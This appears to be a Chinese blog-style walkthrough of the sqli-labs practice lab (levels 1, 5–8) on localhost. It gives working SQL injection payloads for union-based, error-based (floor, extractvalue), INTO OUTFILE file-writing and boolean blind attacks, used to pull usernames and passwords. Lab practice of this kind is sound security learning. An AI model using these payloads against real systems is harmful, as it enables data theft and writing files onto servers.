sqli-labs靶场练习（1、5-8关）

自己搭建环境啊喂...http://127.0.0.1/sqli-labs-php7-master/

第一关

1.单引号判断是否存在注入点

/?id=1'

2.查询列数

?id=1' order by 3--+

?id=1' order by 4--+

由此可判断有3列

3.查询用户名和密码分别在哪列

?id=-1' union select 1,2,3 --+

4.查询数据库名称为security

?id=-1' union select 1,(select database()),3 --+

5.查看数据库中的表名

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

6.查看users表中的字段

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

7.查看字段对应的值

?id=-1' union select 1,(select group_concat(concat(username,'%23',password)) from security.users),3 --+

第二关到第四关差别较小，直接做第五关罢

第五关

各种查询都显示”You are in......”，判断需要盲注

这里可以看到，查询的字段超过3个后出现报错，因此可以尝试使用报错注入

1.通过floor报错注入查询出数据库名为security

?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(14)*2),0x23,(database())))--+

2.查询出表名

?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(14)*2),0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+

3.查询users表中的字段

?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(14)*2),0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+

到这儿基本就结束了

第六关

1.查询发现是双引号闭合

2.用extractvalue报错注入查询数据库名为security

?id=1" and extractvalue(1,concat(0x23,database(),0x23))--+

3.查询表名

?id=1" and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x23))--+

4.查询users表中的字段

?id=1" and extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x23))--+

5.查询字段username下的数据

?id=1" and extractvalue(1,concat(0x23,(select group_concat(username) from users),0x23))--+

6.查询字段password下的数据

?id=1" and extractvalue(1,concat(0x23,(select group_concat(password) from users),0x23))--+

第七关

第七关需要修改secure-file-priv的参数

修改保存后重启mysql服务即可

进入第七关

1.多试几次，可以发现这关的闭合点是’))

2.使用into outfile函数将一个php文件写入服务器目录（需要知道本地路径）

?id=1'))  union select 1,"<?phpinfo();?>",3 into outfile "D:\\PHP\\phpstudy_pro\\WWW\\test.php" --+

3.或者通过into outfile函数将数据库相关信息打印出来

?id=-1')) union select @@datadir,@@basedir,database() into outfile "C:\\Users\\14619\\Desktop\\test1.txt" --+

这里我输出到了桌面上的一个新文档text1里

4.知道数据库名后就可以继续把表信息打印出来了

?id=-1')) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' into outfile "C:\\Users\\14619\\Desktop\\test2.txt" --+

5.然后是users表里的信息

?id=-1')) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' into outfile "C:\\Users\\14619\\Desktop\\test3.txt" --+

6.最后是各字段对应的数据

?id=-1')) union select 1,group_concat(username),group_concat(password) from users into outfile "C:\\Users\\14619\\Desktop\\test4.txt" --+

第八关

布尔盲注太繁杂了，这里就仅演示查出数据库名的过程

1.判断闭合点的过程就省略了，是单引号

2..判断数据库长度

?id=1' and length(database())>5--+

?id=1' and length(database())>10--+

?id=1' and length(database())<10--+

这里可以确定数据库长度在5到10之间

继续尝试发现数据库长度为8

?id=1' and length(database())=8--+

3.判断数据库名

?id=1’ and substr(database(),1,1)>’g’--+

?id=1’ and substr(database(),1,1)>’t’--+

这里判断出数据库名的第一个字符在g和t之间

继续缩小范围得出第一个字符为s

?id=1’ and substr(database(),1,1)=’s’--+

简单修改可继续查找第二个字符

?id=1’ and substr(database(),2,1)>’g’--+

同理，最后可得出数据库名为security